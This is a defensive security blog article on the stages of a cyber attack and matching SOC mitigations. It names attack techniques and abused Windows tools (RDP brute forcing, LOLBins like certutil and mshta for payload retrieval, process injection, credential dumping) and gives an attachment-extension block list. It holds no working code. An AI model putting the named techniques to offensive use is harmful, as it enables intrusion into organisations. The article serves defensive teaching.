SOC First Defense phase – Understanding the Cyber Attack Chain – A Defense Approach with/without SOC
September 2, 2019 Share

SOC First Defense phase – Understanding the Cyber Attack Chain – A Defense Approach with/without SOC

attack chain

This article will help you to understand the modern cyber threats and the most commonly used attack surfaces behind any malware/cyber-attacks. In most times, the cyber attacks are getting executed in stages. So the SOC team must understand the attack patterns and the attack chain.

So breaking the attack chain and averting the criminals intend to stop their goal, will reduce the business impact from the data being lost. This will not provide you with 100% defense steps or blue-team guides to your organization.

It’ll provide a piece of brief information over the attack vectors and every SOC team must create a defense mechanism for it to have an initial stage of security monitoring.

These steps can be followed by any Network Security Teams or small scale industries or smaller firms who cannot afford SOC, will help to create a defense wall with this.

3 Major facts you need to keep in mind.

Cybercriminals always plan ahead of security controls.

1.) Don’t give everything easily to the attacker, make it harder for him to get. (Control Measures in the network)
2.) Don’t enable legitimate vulnerable application if not in use, attackers always use legit applications in the network. (Abuse of LOLBins)
3.) Don’t think that attackers create an only a single piece of code, they always rely on attack stages with more commands and functionalities. (Cyber Kill Chains)

So, the defense mechanisms you have to build based upon your environment.

1.) Defending against the malware delivery – Entering your organization network
2.) If malware delivered successful, how you going to defend its lateral movement and persistence? – Moving inside your organization network.
3.) If the attacker accomplished all his activities, his final stage will be exfiltrated or breach – Leaving your organization Network.

attack chain
Fig: This is not Cyber Kill Chain. It’s a basic phase of attack.

Let’s break down the stages and see the defense mechanisms of it to ensure security from common infection vectors.

Stage 1: Delivery of Malware/MalSpam

In every organization, firewalls/IPS and email gateways play a vital role in defending against the malware delivery to your organization. But in recent times, these techniques are easily getting defeated by Cyber attackers.

The modern-day cyber attacks aren’t a single stage, they deliver malware to any organizations in stages of infections. First, the attacker lures the victim to click any non-malicious urls and it redirects to CnC and drops the payloads. These stages cannot be blocked by traditional defense systems.

Major Two ways: 1.) Email Delivery – MalSpam, Spear phishing, Email Campaigns 2.) RDP Entry Points

A.) Common used Email attachments in most email campaigns.
1 .vbs (VBScript file)
2 .js (JavaScript file)
3 .exe (executable)
4 .jar (Java archive file)
5 .docx, .doc, .dot (Office docs)
6 .html, .htm (webpage files)
7 .wsf (Windows script file)
8 .pdf
9 .xml (Excel file)
10.rtf (rich text format file, used by Office).

Block unwanted and unauthorized email attachment extensions.Gmail blocked these extensions and it can be blocked in your organizations too. .ade, .adp, .bat, .chm, .cmd, .com, .cpl, .dll, .dmg, .exe, .hta, .ins, .isp, .jar, .js, .jse, .lib, .lnk,.mde, .msc, .msi, .msp, .mst, .nsh .pif, .scr, .sct,.shb, .sys, .vb, .vbe, .vbs, .vxd, .wsc, .wsf, .wsh

B.) Restrict the employees to run the scripts at the endpoint level.
C.) User Awareness on spam emails and adequate training.

RDP – Remote Desktop Protocol (Port 3389) Identifying servers with vulnerable RDP connections (port 3389 is default) has been made incredibly easy thanks to scanning tools like Shodan and masscan.

From there, it’s simply a matter of applying brute-forcing tools like NLBrute to crack the RDP account credentials, and attackers are in. Alternatively, if attackers are feeling especially lazy they can simply head over to the underground DarkMarket xDedic, where RDP access to a compromised server can cost as little as $6.

RDP has become a favorite infection vector for ransomware criminals, in particular, with the actors behind SamSam, CrySiS, LockCrypt, Shade, Apocalypse, and other variants all getting in on the act.

Defense Mechanism of RDP Abuse:
o Restrict access via firewalls
o Use strong passwords and 2FA/MFA
o Limit users who can log in using RDP
o Set an account lockout policy to encounter brute force attacks.

Stage 1A: Retrieval of payloads from Command & Control servers.

In recent variants, the emails are the viable options for cyber attackers to lure the victim to click any malicious links by attractive words or images. In some scenarios, the email is the 1st stage to lure the victim to run any scripts from the email, which will abuse the user’s applications and download any payloads for the 2nd stage of infection. Disabling or restricting those legitimate resources from downloading files from the Internet can help prevent payload retrieval.

Cyber Attackers always love to abuse legitimate Microsoft office applications to accomplish their goals. Because
1.) Office applications are universally accepted. Most attachment names used by attackers in an email (Invoice, Spreadsheet, Reports, Balance Sheets, Documents, Tenders)
2.) Office apps are easy to weaponize. Microsoft in-built capabilities are attracted by attackers and they utilize in more ways.

How attackers abuse Microsoft applications to retrieve payloads?

A.) Macros – Disable or restrict
B.) Object Linking and Embedding (OLE) – Disable or restrict
C.) Dynamic Data Exchange (DDE) – Functionality removed from Word, still needs to be disabled in Excel and Outlook
D.) Exploiting Equation Editor – CVE-2017-11882 – Functionality removed in January 2018 Windows Security Update

Not only Microsoft Office applications, attackers also use the legitimate applications and windows in-built tools to retrieve payloads.

A.) VBScript and JavaScript – Disabling it if not needed
B.) Powershell – Disabling or reducing the capabilities by using Applocker or Windows Software Restriction Policy (SRP).
C.) Abusing certutil.exe, mshta.exe, regsvr32.exe, bitsadmin.exe and curl.exe – Blocking the application and block from making outbound requests.

Legitimate Applications The Following Can Be Used To Circumvent Application Whitelisting: Either Blocking or Under Monitoring is recommended.

attack chain

Stage 2: Ensure the malware is not getting executed and spread over the organization

attack chain

Traditionally, organizations have relied on antivirus (AV) software to prevent malware from running.

Attacks have evolved to bypass/evade AV. To be effective, endpoint protection software should utilize machine learning for smarter file analysis and real-time system activity analysis designed for detecting and blocking malicious behaviors.

Application whitelisting is another good layer but can be difficult to maintain. Attackers can also bypass whitelisting and AV by injecting malicious code into approved processes.

Attackers can also bypass whitelisting and many AV/NGAV solutions by injecting malicious code into the memory space of a legitimate process, thereby hijacking its privileges and executing under its guise.

There are a variety of malicious injection techniques attackers can utilize; DLL Injection, Reflective DLL Injection, Process Hollowing, Process doppelganging, AtomBombing, etc.

Defense against the malware execution in your environment are,

1.) Endpoint protection.
2.) Application whitelisting
3.) If possible, disable or restrict users from running scripts
4.) Windows Control over Folders
5.) To prevent injection techniques, monitoring processes and API calls.

Stage 3: Ensure your data aren’t exfiltrated or breached at/after the final stage of the attack chain

attack chain

Once attackers have initial access, their attention turns to post-exploitation activities To continue operating under the radar, attackers prefer “living off the land,” using legitimate tools and processes already present on the system. One of the first goals of post-exploitation is typically privilege escalation, the process of gaining additional rights and access To achieve persistence.

Attackers can abuse system tools and functionality to create various load points, including storing scripts in the registry.

A growing number of malware variants are designed to propagate automatically, often by abusing remote administration tools.

The strategy of abusing legitimate programs and built-in functionality in order to carry out malicious activities without raising red flags. Some of
the most commonly abused tools are PowerShell, Windows Management Instrumentation (WMI), and remote administration tools like PsExec.

Attacker Techniques and Defense Mechanisms:

1.) Abusing programs designed to auto-elevate
a.) Use highest UAC enforcement level whenever possible.
b.) Enable Admin Approval Mode.
c.) Remove users from local admin group.
2.) DLL hijacking
a.) Endpoint protection software.
b.) Disallow loading of remote DLLs.
c.) Enable Safe DLL Search Mode.

3.) Privilege escalation exploits (token stealing, exploiting NULL pointer dereference vulnerabilities, setting security descriptors to NULL, etc.)
a.) Endpoint protection software with user space, kernel space, and CPU-level visibility.
4.) Dumping credentials
a.) Disable credential caching.
b.) Disable or restrict PowerShell with AppLocker.
c.) Practice the least privilege, avoid credential overlap.
d.) Endpoint protection software that protects LSASS and other credential stores
5.) Lateral movement techniques (abusing remote administration tools, etc.)
a.) UAC settings recommendations.
b.) Network segmentation best practices (ref: SANS)
c.) Two-factor authentication (2FA).
6.) Hiding malicious scripts in the registry
a.) Monitor with Autoruns.
7.) Creating malicious scheduled tasks
a.) Monitor for Windows Security Log Event ID 4698.
8.) Abusing WMI to trigger script execution based on events (at startup, etc.)
a.) Create defensive WMI event subscriptions.
a.) When possible, set a fixed port for remote WMI and block it.


This is all about the basic understanding of what kind of threat vectors and attack surfaces we might encounter in our organization and build a defense wall at basic level.

This will not provide you 100% safe against all threats, there are more number of unique ways emerging and more correlation of the malware patterns in arise. So we must ensure that we are already safe against the know pattern of cyber attacks based upon above recommendations.

Remember, “When defenders learn, offenders evolve“.

This post SOC First Defense phase – Understanding the Cyber Attack Chain – A Defense Approach with/without SOC originally appeared on GB Hackers.

Read More